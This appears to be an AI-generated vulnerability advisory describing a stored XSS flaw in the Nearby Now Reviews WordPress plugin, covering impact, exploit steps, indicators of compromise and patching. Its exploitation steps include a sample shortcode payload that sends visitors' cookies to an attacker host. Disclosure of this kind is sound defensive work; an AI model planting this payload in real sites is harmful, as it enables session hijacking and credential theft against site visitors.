CVE-2025-13853: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-13853 is a Stored Cross-Site Scripting (XSS) vulnerability in the Nearby Now Reviews plugin for WordPress. It affects all versions up to and including 5.2, and was disclosed on January 9, 2026, with Wordfence as the reporting CNA. The flaw allows authenticated attackers with Contributor-level access or higher to inject arbitrary web scripts via the data_tech parameter of the nn-tech shortcode. It carries a CVSS v3.1 base score of 6.4 (Medium) (Wordfence, NVD).

Technical details

The root cause is insufficient input sanitization and output escaping of the data_tech parameter within the nn-tech shortcode handler, classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). An authenticated contributor can embed a malicious shortcode containing arbitrary JavaScript into a WordPress post or page; when any user visits that page, the injected script executes in their browser context. The vulnerable code path is visible in the plugin source at line 160 of nn-reviews.php (WordPress Plugin Trac, Wordfence).

Impact

Successful exploitation allows injected scripts to execute in the browsers of all users who visit the compromised page, impacting both confidentiality (e.g., session cookie theft, credential harvesting) and integrity (e.g., page content manipulation, phishing redirects). Because the scope is changed (S:C in the CVSS vector), the impact extends beyond the plugin itself to the broader WordPress site and its visitors. Availability is not directly affected, but persistent script injection can degrade user trust and enable further attacks such as account takeover (Wordfence).

Exploitability

No public exploit code or active in-the-wild exploitation has been reported for CVE-2025-13853. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires at minimum Contributor-level authentication on the target WordPress site, which limits the attack surface compared to unauthenticated vulnerabilities (Wordfence).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the Nearby Now Reviews plugin at version 5.2 or earlier, using tools like WPScan or by inspecting page source for plugin indicators.
  2. Obtain Contributor access: Register or compromise an account with at least Contributor-level privileges on the target WordPress site.
  3. Craft malicious shortcode: Create or edit a post/page and insert a shortcode payload such as [nn-tech data_tech="<script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].
  4. Publish the page: Submit the post for publication or save it as a draft (depending on site configuration); the unsanitized data_tech value is stored in the database.
  5. Trigger execution: When any authenticated or unauthenticated user visits the page containing the injected shortcode, the malicious script executes in their browser, enabling session hijacking, credential theft, or further malicious actions (Wordfence, WordPress Plugin Trac).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to wp-admin/post.php or REST API endpoints containing nn-tech shortcode with suspicious data_tech values including <script>, javascript:, or encoded variants.
  • Database: WordPress wp_posts table entries containing [nn-tech data_tech= with embedded script tags or event handlers (e.g., onerror=, onload=).
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after visiting pages containing the nn-tech shortcode, potentially carrying cookie or session data in query parameters.
  • File System: No direct file-system artifacts expected, as the payload is stored in the database rather than written to disk.

Mitigation and workarounds

Site administrators should update the Nearby Now Reviews plugin to version 5.3 or later, which contains the fix for insufficient input sanitization and output escaping (Wordfence). As an interim workaround, restrict Contributor-level user registration and post publishing capabilities, or disable the plugin entirely until patching is feasible. Web application firewalls (WAFs) with XSS filtering rules, such as those provided by Wordfence, can help block exploitation attempts while the patch is applied.

Community reactions

Wordfence disclosed the vulnerability through their threat intelligence platform and assigned the CVE. The vulnerability received routine aggregation coverage from security databases including VulDB, Vulners, and CIRCL, with a brief mention on Bluesky via automated CVE feeds. No notable researcher commentary or significant media coverage beyond standard vulnerability tracking has been identified for this CVE.

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management